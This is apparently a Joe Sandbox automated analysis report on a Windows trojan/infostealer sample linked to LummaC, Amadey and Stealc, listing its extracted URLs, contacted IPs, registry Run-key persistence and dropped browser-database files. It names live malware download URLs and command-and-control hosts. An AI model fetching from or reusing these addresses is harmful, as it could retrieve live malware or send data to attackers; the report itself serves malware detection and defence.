http://x1.i.lencr.org/0	0d287ea527.exe, 00000009.00000003.2593713005.00000000051E9000.00000004.00000800.00020000.00000000.sdmp, 0d287ea527.exe, 00000012.00000003.2767455140.00000000058E3000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000015.00000003.2766629692.0000000004FA2000.00000004.00000800.00020000.00000000.sdmp	false		high
https://infra.spec.whatwg.org/#ascii-whitespace	firefox.exe, 0000001A.00000003.2799161819.0000028CA3172000.00000004.00000800.00020000.00000000.sdmp	false		high
https://developer.mozilla.org/en-US/docs/Glossary/speculative_parsingDocumentWriteIgnored	firefox.exe, 0000001A.00000002.2883449828.0000028C9CC21000.00000004.00000800.00020000.00000000.sdmp	false		high
https://support.mozilla.org/products/firefoxgro.all	BitLockerToGo.exe, 00000015.00000003.2769151966.000000000519D000.00000004.00000800.00020000.00000000.sdmp	false		high
https://mail.yahoo.co.jp/compose/?To=%s	firefox.exe, 0000001A.00000002.2867787047.0000028C9AA2C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000003.2719539849.0000028C9AA33000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2849549835.0000028C9737C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2863474387.0000028C992C1000.00000004.00000800.00020000.00000000.sdmp	false		high
http://185.215.113.16/mine/random.exeE=	c4df60870c.exe, 0000000A.00000002.2974865414.0000000001181000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
https://contile.services.mozilla.com/v1/tiles	firefox.exe, 0000001A.00000002.2918738618.0000028CA3052000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2918738618.0000028CA30A3000.00000004.00000800.00020000.00000000.sdmp	false		high
https://monitor.firefox.com/user/preferences	firefox.exe, 0000001A.00000002.2847623148.0000028C96D80000.00000002.08000000.00040000.00000000.sdmp	false		high
https://screenshots.firefox.com/	firefox.exe, 0000001A.00000003.2715980139.0000028C9AE5A000.00000004.00000800.00020000.00000000.sdmp	false		high
https://firefox-source-docs.mozilla.org/remote/Security.html	firefox.exe, 0000001A.00000002.2849549835.0000028C97326000.00000004.00000800.00020000.00000000.sdmp	false		high
https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/tracking-content-report	firefox.exe, 0000001A.00000002.2847623148.0000028C96D80000.00000002.08000000.00040000.00000000.sdmp	false		high
http://185.215.113.16/steam/random.exe.	skotes.exe, 00000006.00000002.2981894572.000000000124A000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://vk.com/	firefox.exe, 0000001A.00000002.2849549835.0000028C973E0000.00000004.00000800.00020000.00000000.sdmp	false		high
https://tools.ietf.org/html/draft-ietf-httpbis-encryption-encoding-02#section-4	firefox.exe, 0000001A.00000002.2883449828.0000028C9CC21000.00000004.00000800.00020000.00000000.sdmp	false		high
https://tools.ietf.org/html/draft-ietf-httpbis-encryption-encoding-02#section-2	firefox.exe, 0000001A.00000002.2883449828.0000028C9CC21000.00000004.00000800.00020000.00000000.sdmp	false		high
https://github.com/google/closure-compiler/issues/3177	firefox.exe, 0000001A.00000003.2799161819.0000028CA3172000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000003.2797063483.0000028CA3173000.00000004.00000800.00020000.00000000.sdmp	false		high
https://webextensions.settings.services.mozilla.com/v1	firefox.exe, 0000001A.00000002.2847623148.0000028C96D80000.00000002.08000000.00040000.00000000.sdmp	false		high
http://185.215.113.16/1ld-	0d287ea527.exe, 00000009.00000003.2825831566.000000000075C000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/firefox-relay-integration	firefox.exe, 0000001A.00000002.2847623148.0000028C96D80000.00000002.08000000.00040000.00000000.sdmp	false		high
https://account.bellmedia.caget	firefox.exe, 0000001A.00000002.2884703213.0000028C9CD4B000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://addons.mozilla.org/%LOCALE%/firefox/	firefox.exe, 0000001A.00000002.2847623148.0000028C96D80000.00000002.08000000.00040000.00000000.sdmp	false		high
https://worddosofrm.shop/k	BitLockerToGo.exe, 00000015.00000003.2896788902.0000000004F7B000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000015.00000003.2926073027.0000000004F7B000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://worddosofrm.shop/h	BitLockerToGo.exe, 00000015.00000003.2927336825.0000000002AE6000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000015.00000003.2921888267.0000000002AE2000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://www.avito.ru/	firefox.exe, 0000001A.00000002.2849549835.0000028C973E0000.00000004.00000800.00020000.00000000.sdmp	false		high
http://developer.mozilla.org/en/docs/DOM:element.removeEventListener	firefox.exe, 0000001A.00000002.2883449828.0000028C9CC21000.00000004.00000800.00020000.00000000.sdmp	false		high
https://spocs.getpocket.com	firefox.exe, 0000001A.00000002.2909177907.0000028C9E9AE000.00000004.00000800.00020000.00000000.sdmp	false		high
https://developers.google.com/safe-browsing/v4/advisory	firefox.exe, 0000001A.00000002.2847623148.0000028C96D80000.00000002.08000000.00040000.00000000.sdmp	false		high
https://founpiuer.store/pi	0d287ea527.exe, 00000012.00000003.2706092169.00000000010FC000.00000004.00000020.00020000.00000000.sdmp	false		high
https://hg.mozilla.org/releases/mozilla-release/rev/68e4c357d26c5a1f075a1ec0c696d4fe684ed881	firefox.exe, 0000001A.00000002.2842783233.0000028C8B011000.00000004.00000800.00020000.00000000.sdmp	false		high
http://poczta.interia.pl/mh/?mailto=%s	firefox.exe, 0000001A.00000002.2849549835.0000028C9737C000.00000004.00000800.00020000.00000000.sdmp	false		high
https://worddosofrm.shop/Y	BitLockerToGo.exe, 00000015.00000003.2927336825.0000000002AE6000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000015.00000003.2921888267.0000000002AE2000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://vpn.mozilla.org/?utm_source=firefox-browser&utm_medium=firefox-browser&utm_campaign=about-pr	firefox.exe, 0000001A.00000002.2847623148.0000028C96D80000.00000002.08000000.00040000.00000000.sdmp	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
185.215.113.43	unknown	Portugal	206894	WHOLESALECONNECTIONSNL	true
216.58.206.36	unknown	United States	15169	GOOGLEUS	false
34.117.188.166	contile.services.mozilla.com	United States	139070	GOOGLE-AS-APGoogleAsiaPacificPteLtdSG	false
31.41.244.11	unknown	Russian Federation	61974	AEROEXPRESS-ASRU	false
104.21.5.155	founpiuer.store	United States	13335	CLOUDFLARENETUS	false
185.215.113.16	unknown	Portugal	206894	WHOLESALECONNECTIONSNL	true
142.250.185.238	youtube.com	United States	15169	GOOGLEUS	false
34.107.221.82	prod.detectportal.prod.cloudops.mozgcp.net	United States	15169	GOOGLEUS	false
239.255.255.250	unknown	Reserved	unknown	unknown	false
104.21.16.142	worddosofrm.shop	United States	13335	CLOUDFLARENETUS	true
185.215.113.206	unknown	Portugal	206894	WHOLESALECONNECTIONSNL	true
142.250.186.100	www.google.com	United States	15169	GOOGLEUS	false
35.190.72.216	prod.classify-client.prod.webservices.mozgcp.net	United States	15169	GOOGLEUS	false

Private

IP
192.168.2.4
127.0.0.1

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1549577
Start date and time:	2024-11-05 18:44:05 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 11m 27s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	40
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	file.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@81/49@84/15
EGA Information:	Successful, ratio: 66.7%
HCA Information:	Failed
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 93.184.221.240, 192.229.221.95, 64.233.167.84, 142.250.74.206, 216.58.212.163, 34.104.35.123, 142.250.186.67, 142.250.184.227, 184.28.89.167, 172.217.16.206, 74.125.133.84, 23.32.186.2, 2.22.242.139, 2.22.242.82, 52.11.191.138, 54.185.230.140, 35.160.212.113, 88.221.126.2
Excluded domains from analysis (whitelisted): azurefd-t-fb-prod.trafficmanager.net, slscr.update.microsoft.com, incoming.telemetry.mozilla.org, clientservices.googleapis.com, learn.microsoft.com, aus5.mozilla.org, e11290.dspg.akamaiedge.net, mdec.nelreports.net.akamaized.net, clients2.google.com, go.microsoft.com, ocsp.digicert.com, star-azurefd-prod.trafficmanager.net, a1883.dscd.akamai.net, learn.microsoft.com.edgekey.net, www.gstatic.com, fs.microsoft.com, shavar.prod.mozaws.net, accounts.google.com, otelrules.azureedge.net, ctldl.windowsupdate.com, learn.microsoft.com.edgekey.net.globalredir.akadns.net, detectportal.prod.mozaws.net, firstparty-azurefd-prod.trafficmanager.net, fe3cr.delivery.mp.microsoft.com, edgedl.me.gvt1.com, e13636.dscb.akamaiedge.net, learn-public.trafficmanager.net, go.microsoft.com.edgekey.net, clients.l.google.com, location.services.mozilla.com, wcpstatic.microsoft.com
Execution Graph export aborted for target 0d287ea527.exe, PID 7788 because there are no executed function
Execution Graph export aborted for target freecam.exe, PID 7588 because there are no executed function
HTTPS sessions have been limited to 150. Please view the PCAPs for the complete data.
Not all processes where analyzed, report is missing behavior information
Report creation exceeded maximum time and may have missing disassembly code information.
Report size exceeded maximum capacity and may have missing behavior information.
Report size exceeded maximum capacity and may have missing network information.
Report size getting too big, too many NtOpenFile calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryAttributesFile calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
VT rate limit hit for: file.exe

Simulations

Behavior and APIs

Time	Type	Description
12:46:00	API Interceptor	16956x Sleep call for process: skotes.exe modified
12:46:22	API Interceptor	65x Sleep call for process: 0d287ea527.exe modified
12:46:36	API Interceptor	8x Sleep call for process: BitLockerToGo.exe modified
12:46:43	API Interceptor	187x Sleep call for process: c4df60870c.exe modified
17:44:56	Task Scheduler	Run new task: skotes path: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
17:46:24	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run 0d287ea527.exe C:\Users\user\AppData\Local\Temp\1004154001\0d287ea527.exe
17:46:33	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run c4df60870c.exe C:\Users\user\AppData\Local\Temp\1004155001\c4df60870c.exe
17:46:42	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run 2f0cb7128a.exe C:\Users\user\AppData\Local\Temp\1004156001\2f0cb7128a.exe
17:46:50	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run a8e43ec2b6.exe C:\Users\user\AppData\Local\Temp\1004157001\a8e43ec2b6.exe
17:46:59	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run 0d287ea527.exe C:\Users\user\AppData\Local\Temp\1004154001\0d287ea527.exe
17:47:07	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run c4df60870c.exe C:\Users\user\AppData\Local\Temp\1004155001\c4df60870c.exe
17:47:17	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run 2f0cb7128a.exe C:\Users\user\AppData\Local\Temp\1004156001\2f0cb7128a.exe

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
185.215.113.43	file.exe	Get hash	malicious	LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc	Browse	185.215.113.43/Zu7JuNko/index.php
	file.exe	Get hash	malicious	Amadey, Credential Flusher, LummaC Stealer, Stealc, Vidar	Browse	185.215.113.43/Zu7JuNko/index.php
	file.exe	Get hash	malicious	PureCrypter, LummaC, Amadey, LummaC Stealer, Stealc, XWorm	Browse	185.215.113.43/Zu7JuNko/index.php
	file.exe	Get hash	malicious	LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, Vidar	Browse	185.215.113.43/Zu7JuNko/index.php
	file.exe	Get hash	malicious	LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, Vidar	Browse	185.215.113.43/Zu7JuNko/index.php
	file.exe	Get hash	malicious	LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc	Browse	185.215.113.43/Zu7JuNko/index.php
	file.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, Stealc, Vidar	Browse	185.215.113.43/Zu7JuNko/index.php
	file.exe	Get hash	malicious	LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, Vidar	Browse	185.215.113.43/Zu7JuNko/index.php
	file.exe	Get hash	malicious	PureCrypter, LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, Vidar	Browse	185.215.113.43/Zu7JuNko/index.php
	file.exe	Get hash	malicious	LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, Vidar	Browse	185.215.113.43/Zu7JuNko/index.php
34.117.188.166	file.exe	Get hash	malicious	Credential Flusher	Browse
	file.exe	Get hash	malicious	Credential Flusher	Browse
	file.exe	Get hash	malicious	LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc	Browse
	file.exe	Get hash	malicious	Credential Flusher	Browse
	file.exe	Get hash	malicious	Credential Flusher	Browse
	file.exe	Get hash	malicious	Amadey, Credential Flusher, LummaC Stealer, Stealc, Vidar	Browse
	file.exe	Get hash	malicious	Credential Flusher	Browse
	file.exe	Get hash	malicious	Credential Flusher	Browse
	file.exe	Get hash	malicious	Credential Flusher	Browse
	file.exe	Get hash	malicious	Credential Flusher	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
prod.balrog.prod.cloudops.mozgcp.net	file.exe	Get hash	malicious	Credential Flusher	Browse	35.244.181.201
	file.exe	Get hash	malicious	Credential Flusher	Browse	35.244.181.201
	file.exe	Get hash	malicious	LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc	Browse	35.244.181.201
	file.exe	Get hash	malicious	Credential Flusher	Browse	35.244.181.201
	file.exe	Get hash	malicious	Credential Flusher	Browse	35.244.181.201
	file.exe	Get hash	malicious	Amadey, Credential Flusher, LummaC Stealer, Stealc, Vidar	Browse	35.244.181.201
	file.exe	Get hash	malicious	Credential Flusher	Browse	35.244.181.201
	file.exe	Get hash	malicious	Credential Flusher	Browse	35.244.181.201
	file.exe	Get hash	malicious	PureCrypter, LummaC, Amadey, LummaC Stealer, Stealc, XWorm	Browse	35.244.181.201
	file.exe	Get hash	malicious	Credential Flusher	Browse	35.244.181.201
example.org	file.exe	Get hash	malicious	Credential Flusher	Browse	93.184.215.14
	file.exe	Get hash	malicious	Credential Flusher	Browse	93.184.215.14
	file.exe	Get hash	malicious	LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc	Browse	93.184.215.14
	file.exe	Get hash	malicious	Credential Flusher	Browse	93.184.215.14
	file.exe	Get hash	malicious	Credential Flusher	Browse	93.184.215.14
	file.exe	Get hash	malicious	Amadey, Credential Flusher, LummaC Stealer, Stealc, Vidar	Browse	93.184.215.14
	file.exe	Get hash	malicious	Credential Flusher	Browse	93.184.215.14
	file.exe	Get hash	malicious	Credential Flusher	Browse	93.184.215.14
	file.exe	Get hash	malicious	PureCrypter, LummaC, Amadey, LummaC Stealer, Stealc, XWorm	Browse	93.184.215.14
	file.exe	Get hash	malicious	Credential Flusher	Browse	93.184.215.14
star-mini.c10r.facebook.com	file.exe	Get hash	malicious	Credential Flusher	Browse	157.240.253.35
	file.exe	Get hash	malicious	Credential Flusher	Browse	157.240.251.35
	file.exe	Get hash	malicious	Credential Flusher	Browse	157.240.253.35
	file.exe	Get hash	malicious	Credential Flusher	Browse	157.240.253.35
	Steelcase Series 1 Sustainable Office Chair _ Steelcase.html	Get hash	malicious	Unknown	Browse	157.240.252.35
	file.exe	Get hash	malicious	Credential Flusher	Browse	157.240.0.35
	file.exe	Get hash	malicious	Credential Flusher	Browse	157.240.253.35
	file.exe	Get hash	malicious	PureCrypter, LummaC, Amadey, LummaC Stealer, Stealc, XWorm	Browse	157.240.0.35
	file.exe	Get hash	malicious	Credential Flusher	Browse	157.240.253.35
	file.exe	Get hash	malicious	Credential Flusher	Browse	157.240.253.35

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
GOOGLE-AS-APGoogleAsiaPacificPteLtdSG	file.exe	Get hash	malicious	Credential Flusher	Browse	34.117.188.166
	file.exe	Get hash	malicious	Credential Flusher	Browse	34.117.188.166
	file.exe	Get hash	malicious	LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc	Browse	34.117.188.166
	file.exe	Get hash	malicious	Credential Flusher	Browse	34.117.188.166
	file.exe	Get hash	malicious	Credential Flusher	Browse	34.117.188.166
	file.exe	Get hash	malicious	Amadey, Credential Flusher, LummaC Stealer, Stealc, Vidar	Browse	34.117.188.166
	file.exe	Get hash	malicious	Credential Flusher	Browse	34.117.188.166
	file.exe	Get hash	malicious	Credential Flusher	Browse	34.117.188.166
	nuklear.arm.elf	Get hash	malicious	Mirai, Moobot	Browse	34.66.46.177
	file.exe	Get hash	malicious	Credential Flusher	Browse	34.117.188.166
AEROEXPRESS-ASRU	QzX4KXBXPq.exe	Get hash	malicious	LummaC	Browse	31.41.244.11
	file.exe	Get hash	malicious	LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, Vidar	Browse	31.41.244.11
	file.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, Stealc, Vidar, Zhark RAT	Browse	31.41.244.11
	file.exe	Get hash	malicious	LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc	Browse	31.41.244.11
	xJZvlpVpkx.exe	Get hash	malicious	LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc	Browse	31.41.244.11
	file.exe	Get hash	malicious	LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc	Browse	31.41.244.11
	file.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, Stealc	Browse	31.41.244.11
	file.exe	Get hash	malicious	LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc	Browse	31.41.244.11
	file.exe	Get hash	malicious	LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, Xmrig	Browse	31.41.244.11
	file.exe	Get hash	malicious	LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc	Browse	31.41.244.11
WHOLESALECONNECTIONSNL	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse	185.215.113.16
	file.exe	Get hash	malicious	Stealc	Browse	185.215.113.206
	file.exe	Get hash	malicious	LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc	Browse	185.215.113.16
	file.exe	Get hash	malicious	LummaC, Stealc	Browse	185.215.113.16
	file.exe	Get hash	malicious	Stealc	Browse	185.215.113.206
	file.exe	Get hash	malicious	Amadey, Credential Flusher, LummaC Stealer, Stealc, Vidar	Browse	185.215.113.206
	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse	185.215.113.16
	file.exe	Get hash	malicious	Amadey, LummaC Stealer, XWorm	Browse	185.215.113.206
	file.exe	Get hash	malicious	PureCrypter, LummaC, Amadey, LummaC Stealer, Stealc, XWorm	Browse	185.215.113.16
	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse	185.215.113.16

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
28a2c9bd18a11de089ef85a160da29e4	Statement from Invoke Tax Partners.htm	Get hash	malicious	Unknown	Browse	20.109.210.53 184.28.90.27 13.107.246.45
	https://www.google.it/url?q=https://www.google.it/url?q=https://www.google.it/url?q=https://www.google.ro/url?q=https://www.google.nl/url?q=ZFCKQSES42J831UCOWMB4MEAK36T3IE7YuQiApLjODz3yh4nNeW8uuQi&rct=XS%25RANDOM4%25wDnNeW8yycT&sa=t&esrc=nNeW8F%25RANDOM3%25A0xys8Em2FL&source=&cd=tS6T8%25RANDOM3%25Tiw9XH&cad=XpPkDfJX%25RANDOM4%25VS0Y&ved=xjnktlqryYWwZIBRrgvK&uact=&url=amp%2F%74%72%61%6E%68%64%61%69%6C%6F%6E%67%73%61%69%67%6F%6E%2E%63%6F%6D%2F%74%6D%70%2F/3n8/Y2hhcmxlbmUuaG9mZm1hbkBib3VsZGVyY3ZiLmNvbQ==	Get hash	malicious	Tycoon2FA	Browse	20.109.210.53 184.28.90.27 13.107.246.45
	http://app.kodexglobal.com/binance/signup	Get hash	malicious	Unknown	Browse	20.109.210.53 184.28.90.27 13.107.246.45
	http://bankllist.us	Get hash	malicious	Unknown	Browse	20.109.210.53 184.28.90.27 13.107.246.45
	file.exe	Get hash	malicious	Amadey, Credential Flusher, LummaC Stealer, Stealc, Vidar	Browse	20.109.210.53 184.28.90.27 13.107.246.45
	Steelcase Series 1 Sustainable Office Chair _ Steelcase.html	Get hash	malicious	Unknown	Browse	20.109.210.53 184.28.90.27 13.107.246.45
	https://virtual.urban-orthodontics.com	Get hash	malicious	Unknown	Browse	20.109.210.53 184.28.90.27 13.107.246.45
	http://usps.com-trackinse.vip/i	Get hash	malicious	Unknown	Browse	20.109.210.53 184.28.90.27 13.107.246.45
	https://www.solutionfun.info/landingpage/e7038827-a406-4c54-823b-7c3a83053840/7F8TFt1HKugpNPzdYf4k9JkOT83-qSoBFdtvBauuf98	Get hash	malicious	HTMLPhisher	Browse	20.109.210.53 184.28.90.27 13.107.246.45
	http://www.axa-assistance.co.uk	Get hash	malicious	Unknown	Browse	20.109.210.53 184.28.90.27 13.107.246.45
a0e9f5d64349fb13191bc781f81f42e1	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse	104.21.5.155 104.21.16.142
	file.exe	Get hash	malicious	LummaC	Browse	104.21.5.155 104.21.16.142
	file.exe	Get hash	malicious	LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc	Browse	104.21.5.155 104.21.16.142
	file.exe	Get hash	malicious	LummaC, Stealc	Browse	104.21.5.155 104.21.16.142
	file.exe	Get hash	malicious	Amadey, Credential Flusher, LummaC Stealer, Stealc, Vidar	Browse	104.21.5.155 104.21.16.142
	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse	104.21.5.155 104.21.16.142
	L#U043e#U0430der.exe	Get hash	malicious	LummaC	Browse	104.21.5.155 104.21.16.142
	QzX4KXBXPq.exe	Get hash	malicious	LummaC	Browse	104.21.5.155 104.21.16.142
	file.exe	Get hash	malicious	PureCrypter, LummaC, Amadey, LummaC Stealer, Stealc, XWorm	Browse	104.21.5.155 104.21.16.142
	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse	104.21.5.155 104.21.16.142
fb0aa01abe9d8e4037eb3473ca6e2dca	file.exe	Get hash	malicious	Credential Flusher	Browse	35.244.181.201 34.160.144.191 34.120.208.123
	file.exe	Get hash	malicious	Credential Flusher	Browse	35.244.181.201 34.160.144.191 34.120.208.123
	file.exe	Get hash	malicious	LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc	Browse	35.244.181.201 34.160.144.191 34.120.208.123
	file.exe	Get hash	malicious	Credential Flusher	Browse	35.244.181.201 34.160.144.191 34.120.208.123
	file.exe	Get hash	malicious	Credential Flusher	Browse	35.244.181.201 34.160.144.191 34.120.208.123
	file.exe	Get hash	malicious	Amadey, Credential Flusher, LummaC Stealer, Stealc, Vidar	Browse	35.244.181.201 34.160.144.191 34.120.208.123
	file.exe	Get hash	malicious	Credential Flusher	Browse	35.244.181.201 34.160.144.191 34.120.208.123
	file.exe	Get hash	malicious	Credential Flusher	Browse	35.244.181.201 34.160.144.191 34.120.208.123
	file.exe	Get hash	malicious	PureCrypter, LummaC, Amadey, LummaC Stealer, Stealc, XWorm	Browse	35.244.181.201 34.160.144.191 34.120.208.123
	file.exe	Get hash	malicious	Credential Flusher	Browse	35.244.181.201 34.160.144.191 34.120.208.123

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
C:\ProgramData\freebl3.dll	file.exe	Get hash	malicious	Amadey, Credential Flusher, LummaC Stealer, Stealc, Vidar	Browse
	ByVoN4bhSU.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse
	file.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, Stealc, Vidar	Browse
	file.exe	Get hash	malicious	LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, Vidar	Browse
	file.exe	Get hash	malicious	LummaC, Amadey, Cryptbot, LummaC Stealer, Stealc, Vidar	Browse
	file.exe	Get hash	malicious	PureCrypter, LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, Vidar	Browse
	p5iu2ILQzE.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, Stealc, Vidar	Browse
	build.exe	Get hash	malicious	Stealc, Vidar	Browse
	file.exe	Get hash	malicious	LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, Vidar	Browse
	JMFoyLSCjP.exe	Get hash	malicious	Stealc, Vidar	Browse
C:\ProgramData\chrome.dll	file.exe	Get hash	malicious	Amadey, Credential Flusher, LummaC Stealer, Stealc, Vidar	Browse
	file.exe	Get hash	malicious	Amadey, LummaC Stealer, XWorm	Browse
	file.exe	Get hash	malicious	PureCrypter, LummaC, Amadey, LummaC Stealer, Stealc, XWorm	Browse
	file.exe	Get hash	malicious	LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, Vidar	Browse
	ByVoN4bhSU.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse
	file.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, Stealc, Vidar	Browse
	file.exe	Get hash	malicious	LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, Vidar	Browse
	file.exe	Get hash	malicious	PureCrypter, LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, Vidar	Browse
	QS4CbvR1WQ.exe	Get hash	malicious	LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc	Browse
	file.exe	Get hash	malicious	LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc	Browse

Created / dropped Files

C:\ProgramData\AAFIIJDAAAAKFHIDAAAKJJEGDH

Download File

Process:	C:\Users\user\AppData\Local\Temp\1004155001\c4df60870c.exe
File Type:	SQLite 3.x database, user version 75, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 2, database pages 46, cookie 0x26, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	5242880
Entropy (8bit):	0.037963276276857943
Encrypted:	false
SSDEEP:	192:58rJQaXoMXp0VW9FxWZWdgokBQNba9D3DO/JxW/QHI:58r54w0VW3xWZWdOBQFal3dQ
MD5:	C0FDF21AE11A6D1FA1201D502614B622
SHA1:	11724034A1CC915B061316A96E79E9DA6A00ADE8
SHA-256:	FD4EB46C81D27A9B3669C0D249DF5CE2B49E5F37B42F917CA38AB8831121ADAC
SHA-512:	A6147C196B033725018C7F28C1E75E20C2113A0C6D8172F5EABCB8FF334EA6CE10B758FFD1D22D50B4DB5A0A21BCC15294AC44E94D973F7A3EB9F8558F31769B
Malicious:	false
Preview:	SQLite format 3......@ ...................&...................K..................................j.....-a>.~...\|0{dz.z.z"y.y3x.xKw.v.u.uGt.t;sAs.q.p.q.p{o.ohn.nem.n,m9l.k.lPj.j.h.h.g.d.c.c6b.b.a.a>..................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\BKFHCGID

Download File

Process:	C:\Users\user\AppData\Local\Temp\1004155001\c4df60870c.exe
File Type:	SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	114688
Entropy (8bit):	0.9746603542602881
Encrypted:	false
SSDEEP:	192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
MD5:	780853CDDEAEE8DE70F28A4B255A600B
SHA1:	AD7A5DA33F7AD12946153C497E990720B09005ED
SHA-256:	1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
SHA-512:	E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
Malicious:	false
Preview:	SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\CBAKEBGIIDAFIDHIIECF

Download File

Process:	C:\Users\user\AppData\Local\Temp\1004155001\c4df60870c.exe
